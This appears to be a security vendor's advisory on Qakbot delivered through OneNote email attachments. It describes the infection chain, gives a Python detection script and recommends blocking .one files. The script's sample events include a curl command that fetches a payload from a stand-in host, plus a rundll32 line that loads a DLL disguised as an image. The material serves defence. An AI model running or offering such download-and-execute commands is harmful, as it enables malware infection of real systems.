Arctic Wolf has observed a significant increase in the number of malicious files delivered and opened via OneNote email attachments. Unlike malicious Word and Excel files, infected OneNote files do not require the security prompt asking the end-user to allow macros, thus increasing the chances of unknowingly running the malicious executable.
OneNote attachments are delivered via email with encouragement for the end user to click a button to download the attachment and view the document. The current malware iteration places a link that opens batch files behind that button, so when an unsuspecting user clicks the view button, they actually click the batch file, which runs the malicious code.
The code in the malicious HTA file typically leverages a system process, such as mshta.exe or cmd.exe, to contact a malicious URL. This may be achieved using curl.exe or powershell.exe to download the second-stage malware, which threat actors often use as a backdoor into the endpoint and network.
A common OneNote tactic may involve the following steps:
- OneNote attachment sent via email.
- User clicks to retrieve the attachment.
- The HTA application launches curl.exe to contact the malicious URL.
- A malicious DLL is downloaded and saved with an extension of .png or .jpg.
  Note: The URL sometimes references a .gif despite the file being saved locally with a different extension.
- The downloaded malicious DLL is loaded via rundll32.exe.
- Qakbot infection is established.
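The chain above leaves two process-creation patterns a defender can look for in endpoint telemetry: a script host (mshta.exe or cmd.exe) spawning curl.exe or powershell.exe with a URL on the command line, and rundll32.exe being asked to load a module whose extension claims it is an image. The following detection logic is an added example, not Arctic Wolf's code; the event records, paths, file names and the payload.example host are all constructed for illustration and are not indicators from this bulletin, and the field names (parent, image, cmdline) are assumed to be whatever your EDR or Sysmon Event ID 1 pipeline provides.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed process-creation events, modelled loosely on the fields an EDR or
# Sysmon Event ID 1 record carries. Every path, URL and file name is invented
# for this example; none is an indicator from the bulletin.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # stage 1: HTA (mshta.exe) launches curl.exe; the URL names a .gif but
        # the file is written locally as .png, as the bulletin's note describes
        "parent": r"C:\Windows\System32\mshta.exe",
        "image": r"C:\Windows\System32\curl.exe",
        "cmdline": r"curl.exe -o C:\Users\Public\img01.png http://payload.example/gallery/img01.gif",
    },
    {   # stage 2: the downloaded "image" is really a DLL and is run via rundll32
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\rundll32.exe",
        "cmdline": r"rundll32.exe C:\Users\Public\img01.png,EntryPoint",
    },
    {   # benign: an ordinary rundll32 invocation of a real system DLL
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\rundll32.exe",
        "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL",
    },
    {   # benign: a user opens PowerShell interactively from Explorer
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe",
    },
]

SCRIPT_HOSTS = {"mshta.exe", "cmd.exe"}          # processes the HTA code runs under
DOWNLOADERS = {"curl.exe", "powershell.exe"}    # tools used to fetch the second stage
# An image extension at the end of a token (followed by end, whitespace, a comma
# that introduces the rundll32 entry point, or a closing quote).
IMAGE_EXT_RE = re.compile(r"\.(?:png|jpe?g|gif)(?=$|[\s,\"'])", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return the name of the matching rule, or None for an unremarkable event."""
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmdline = event["cmdline"]

    # Rule 1: script host spawns a downloader whose command line names a URL.
    if image in DOWNLOADERS and parent in SCRIPT_HOSTS and URL_RE.search(cmdline):
        return "downloader_from_script_host"

    # Rule 2: rundll32.exe asked to load a module with an image file extension.
    if image == "rundll32.exe" and IMAGE_EXT_RE.search(cmdline):
        return "rundll32_image_extension"

    return None


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str, str]]:
    """Run classify() over a batch and return (index, rule, cmdline) for each hit."""
    hits = []
    for idx, event in enumerate(events):
        rule = classify(event)
        if rule is not None:
            hits.append((idx, rule, event["cmdline"]))
    return hits


if __name__ == "__main__":
    for idx, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] event {idx}: {cmd}")
```

Rule 2 is the higher-confidence signal: rundll32.exe has no legitimate reason to load a module named .png, .jpg or .gif. Rule 1 will also fire on administrators who script curl.exe or powershell.exe from cmd.exe, so in production it is best scoped further (for example to the user-writable download locations seen in the first rule's output) or used as a correlation step rather than an alert on its own.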
Recommendation #1: Block .one Attachments via Email Gateway
We strongly recommend blocking all .one attachments at your email gateway. If you use Microsoft 365, see the Microsoft documentation on how to accomplish this: after enabling the “common attachments filter” option in the “Anti-malware” policy in the Office 365 Defender portal, you will need to manually add the .one extension. If you use another email gateway solution, consult your vendor.